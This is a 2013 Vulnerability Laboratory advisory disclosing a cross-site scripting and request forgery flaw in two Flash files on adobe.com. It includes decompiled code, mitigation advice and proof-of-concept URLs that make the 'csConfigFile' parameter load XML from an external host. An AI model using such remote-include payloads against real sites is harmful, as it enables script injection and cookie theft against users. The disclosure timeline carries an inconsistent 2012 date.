Document Title: =============== Adobe - CS Flash Cross Site Vulnerability & Filter Bypass References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1022 Release Date: ============= 2013-09-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1022 Common Vulnerability Scoring System: ==================================== 2.1 Product & Service Introduction: =============================== Adobe Systems, Inc. is an American multinational computer software company headquartered in San Jose, California, United States. The company has historically focused upon the creation of multimedia and creativity software products, with a more-recent foray towards rich Internet application software development. Adobe was founded in December 1982 by John Warnock and Charles Geschke, who established the company after leaving Xerox PARC in order to develop and sell the PostScript page description language. In 1985, Apple Computer licensed PostScript for use in its LaserWriter printers, which helped spark the desktop publishing revolution. The company name Adobe comes from Adobe Creek in Los Altos, California, which ran behind the houses of both of the company\\\\\\\'s founders. Adobe acquired its former competitor, Macromedia, in December 2005, which added newer software products and platforms such as ColdFusion, Dreamweaver, Flash and Flex to its product portfolio. As of 2010, Adobe Systems has 9,117 employees, about 40% of whom work in San Jose. Adobe also has major development operations in Orlando; Seattle; San Francisco; Lehi, Utah; Minneapolis; Waltham, Massachusetts; and San Luis Obispo, California in the United States; Ottawa, Canada; Hamburg, Germany; Noida and Bangalore, India; Bucharest, Romania; Basel, Switzerland; and Beijing, China. (Copy of the vendor Homepage: http://www.adobe.com) Abstract Advisory Information: ============================== Vulnerability Research Team has discovered a remote client side bug in a flash component in the Adobe Systems official website application. Vulnerability Disclosure Timeline: ================================== 2013-07-17: Researcher Notification & Coordination (Ateeq Khan) 2013-07-18: Vendor Notification (Adobe - Security Team) 2013-08-13: Vendor Response/Feedback (Adobe Security Team) 2013-09-24: Vendor Fix/Patch (Adobe Developer Team) 2012-09-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Adobe Systems Product: Online Service - Web Application 2013 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ A vulnerability laboratory researcher has discovered a flaw inside this particular flash component currently active and running on the main website of Adobe Systems (www.adobe.com). The affected component lets a remote attacker include xml files from external non validated websites resulting in successful HTML Injection & XSS attacks. Attackers are able to execute malicious non-persistent script code on client side and at least two different .swf files have been identified that are affected with this vulnerability. Depending on the Flash player version, the reported issue will be a Cross-Site Scripting or a Cross-Site Request Forgery vulnerability. In Flash player versions 8 and below, the usage of a globally undefined variable in any function that makes a web request will result in a Cross-Site Scripting vulnerability; however in Flash player version 9 and above this vulnerability has been partially mitigated by Adobe resulting in a Cross-Site Request Forgery vulnerability. Given the user’s Flash player is version 9 or above, the end user may be subject to Cross-Site Request Forgery attack. Cross-Site Request Forgery allows an attacker to create an unauthorized web request to a sensitive resource on the user’s behalf. Recommendations for mitigating this type of attack are to initialize any global variables in the Flash application; however if FlashVars need to be used, proper input validation should be performed. The affected path is `/enterprise/partners/sap_tour/Misc/` The affected parameter is `csConfigFile` Normally, it is required to load an xml config file from the localhost however the parameter `csConfigFile=` due to non validation, can be manipulated using the GET method to include remote malicious .xml files of attackers choice. Once included, the client-side script code will be executed in the flash web application layout as frame. Given the user’s Flash player is version 8 or below, a Cross-Site Scripting vulnerability may be executed by an attacker. If successful, Cross-Site Scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. Recommendations for mitigating this type of attack are to initialize any global variables in the Flash application; however if FlashVars need to be used, proper input validation should be performed. Vulnerable Path: [+] http://www.adobe.com/enterprise/partners/sap_tour/Misc/ Vulnerable File(s): [+] Improving_Customer_Service_controller.swf [+] Customer_Cummunications_Management_controller.swf Vulnerable Parameter(s): [+] csConfigFile Proof of Concept (PoC): ======================= The client side cross site scripting vulnerability can be exploited by a remote attacker without any authentication and low or medium required user interaction. For demonstration or reproduce ... POC Link #1: http://www.adobe.com/enterprise/partners/sap_tour/Misc/Customer_Cummunications_Management_controller.swf ?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml POC Link #2 http://www.adobe.com/enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf ?csConfigFile=http://www.evolution-sec.com.com/clients/flashjs/test.xml Review: Source Code MovieClip 0{ // Frame 0 // Action0 { loadConfigFile = function () { ConfigData = new XML(); ConfigData.onLoad = configFileLoaded; ConfigData.ignoreWhite = True; if ( ( _root.csConfigFile == Undefined ) ) { _root.csConfigFile = "config.xml"; } var __callResult_34 = ConfigData.load(_root.csConfigFile); // Validation is not being performed before loading the config file! CSData = new Object(); } Solution - Fix & Patch: ======================= Set appropriate allowScriptAccess and allowNetworking parameters within the HTML code. Perform data validation on variables sent to URL functions to ensure only http:// and https:// protocols are allowed; validate that the URL is for an allowed domain or use relative URLs. Escape special characters placed within HTML text fields. Do not use HTML text fields unless HTML support is needed. Compile the SWF for more recent Flash Player versions. Encourage users to have the latest version of Flash Player to view your content. Security Risk: ============== The security risk of the client site cross site web vulnerability is estimated as medium(-). Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security]